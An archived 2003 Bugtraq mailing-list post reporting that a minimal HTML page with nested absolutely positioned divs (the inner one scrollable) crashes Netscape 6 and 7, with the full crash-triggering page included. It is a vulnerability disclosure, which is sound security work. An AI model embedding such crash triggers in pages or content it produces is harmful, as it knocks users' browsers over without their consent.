[29042] in bugtraq
Netscape 6/7 crashes by a simple stylesheet...
daemon@ATHENA.MIT.EDU (jux@beer.com)
Tue Feb 25 13:07:54 2003
Date: 25 Feb 2003 02:17:23 -0000
Message-ID: <20030225021723.15410.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <jux@beer.com>
To: bugtraq@securityfocus.com
Hi, I'm new here so I don't know if I posted this in the correct list...
I've found out that some simple CSS-code can crash Netscape 6 and 7.
This is a simple html-page containing this code:
<html>
<body>
<div style="position:absolute;">
<div style="position:absolute; overflow:scroll">
</div>
</div>
</body>
</html>
Was this already known?
/Jocke